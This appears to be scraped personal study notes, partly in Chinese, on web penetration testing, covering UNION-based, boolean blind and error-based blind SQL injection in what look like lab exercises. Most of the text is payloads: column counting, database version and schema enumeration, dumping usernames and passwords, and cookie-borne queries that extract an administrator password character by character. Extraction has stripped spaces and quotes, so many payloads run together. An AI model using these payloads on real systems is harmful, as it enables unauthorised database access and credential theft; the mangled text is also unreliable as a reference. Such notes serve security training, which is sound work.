2026/10/7 21:26:57

WEB PENETRATION TESTING-- Admin + is + trator

WEB PENETRATION TESTING-- Admin + is + trator SQLiCtrlu : encode’ 11–PS:After the ’ have a SPACEBut before “–”,have no SPACEUNION-based SQL Injection(1) Determine the number of columnsorder by1✅正常 order by2✅正常 order by3❌报错 OR UNION SELECT NULL ❌报错 UNION SELECT NULL,NULL ✅正常 UNION SELECT NULL,NULL,NULL ❌报错(2) Determine the data types of the columns (must from a table)just know if it’s str# Oracle must have the FROM,so its easy to use FROM dualUNION SELECT NULL,NULL FROM DUAL UNION SELECTa,NULL FROM DUAL UNION SELECT NULL,aFROM DUAL UNION SELECTa,aFROM DUAL#if NULL,a, you could:selectNULL,username||~||password fromusers(3) Output the version of the database数据库版本查询语句OracleSELECT banner FROM v$versionOracleSELECT version FROM v$instanceMicrosoftSELECT versionPostgreSQLSELECT version()MySQLSELECT version# Must match the number of columnUNION SELECT banner, NULL fromv$version--# v$version store version info(4) Output TABLE NAMEUSER_STATS数据库查询所有表查询指定表的列OracleSELECT * FROM all_tablesSELECT * FROM all_tab_columns WHERE table_name TABLE-NAME-HEREMicrosoftSELECT * FROM information_schema.tablesSELECT * FROM information_schema.columns WHERE table_name TABLE-NAME-HEREPostgreSQLSELECT * FROM information_schema.tablesSELECT * FROM information_schema.columns WHERE table_name TABLE-NAME-HEREMySQLSELECT * FROM information_schema.tablesSELECT * FROM information_schema.columns WHERE table_name TABLE-NAME-HEREGoogle:information_schema.tables postgresql to find the “table_name”SELECT*FROMinformation_schema.tablesUNIONSELECTtable_name,NULLFROMinformation_schema.tablesSearch to find the table: “users_vzoxvb”(5) Output COLUMN NAME in tableGoogle:information_schema.columns postgresql to find “column_name” fieldSearch “Table_name” in Response,and use table_name replace the *SELECT*FROMinformation_schema.columnsWHEREtable_nameTABLE-NAME-HEREUNIONSELECTcolumns,NULLFROMinformation_schema.columnsWHEREtable_nametable_name #Typethe users_vzoxvb intotable_namefieldUNIONSELECTcolumn_name,NULLFROMinformation_schema.columnsWHEREtable_nameusers_vzoxvbto Get “username_ggtjng” “password_ccixiu”SELECT COLUMN_NAME FROM all_tab_columns WHERE table_name ‘USERS_DTFKLB’(6) Output Username and PWDUNIONselectusername_ggtjng,password_ccixiu from users_vzoxvbto Rearch “Admin” or Normal UserBlind SQL Injection ResponseDon’t like Union injection that show some data,blind always response “200”.Time-based Blind SQLi could generate cmd which meet specific conditions to dalay the database.(1)Confirm SQLi vulnerable# use the trackingIdselecttracking-idfromtracking-tablewheretrackingIdRvLfBu6s9EZRlVYNCookie: TrackingIdjxuJ6305dQ35cEPz and 11-- - Welcome Cookie: TrackingIdjxuJ6305dQ35cEPzand10-- - No Welcome(2) Confirm that we have a users table# If users table is exist,will output TestIfExistSELECTTestIfExistFROMusers;# So we could test if the users is existingCookie: TrackingIdjxuJ6305dQ35cEPz and (select x from users LIMIT 1)x-- # Confitm the user name is administrator (SELECT a FROM users WHERE usernameadministrator)a Cookie: TrackingIdjxuJ6305dQ35cEPzand(SELECTaFROMusersWHEREusernameadministrator)a--;(3)Determine PWDDetermine the length of PWD,Just use the IntruderCookie:TrackingIdjxuJ6305dQ35cEPz and (SELECT a FROM users WHERE usernameadministratorAND LENGTH(password)20)a--;Then foreach the charCookie:TrackingIdjxuJ6305dQ35cEPz and (SELECT SUBSTRING(password,1,1) FROM users WHERE usernameadministrator)e--Blind SQL Injection ErrorProve that parameter is vulnerable||is to connect str,must use theinstead ofCookie:TrackingIdhzd4cBI1UR0iMgKf||(select from dual)||Confirm users table and administrator# Determine the tableCookie: TrackingIdgiUpOQnNBkR52ME7||(select from users where rownum1)||# rowmun1 is only to retrieve one line# Determine the adminitratorCookie: TrackingIdgiUpOQnNBkR52ME7||(select from users where usernameadminitrator)||(3)Determine the PWDCuz we can’t see the page that have right CMD,so we let the right CMD behavior ERROR,so we can judge the right CMD# If 语句 is right ,we could find the ERROR to judge it is correct.||(SELECT CASE WHEN (语句) THEN TO_CHAR(1/0) ELSE END FROM dual)||# The Real Condition:# Determine Length : SELECT CASE WHEN (LENGTH(password)10)Cookie: TrackingIdgiUpOQnNBkR52ME7||(SELECT CASE WHEN (LENGTH(password)10) THEN TO_CHAR(1/0) ELSE END FROM users WHERE usernameadministrator)||# Determine Char : Notify adminitrator and AND inside the (..... AND substr(password,1,1)a)||(SELECT CASE WHEN (11) THEN TO_CHAR(1/0) ELSE END FROM users WHERE usernameadministrator AND substr(password,1,1)a)||XSS跨站脚本攻击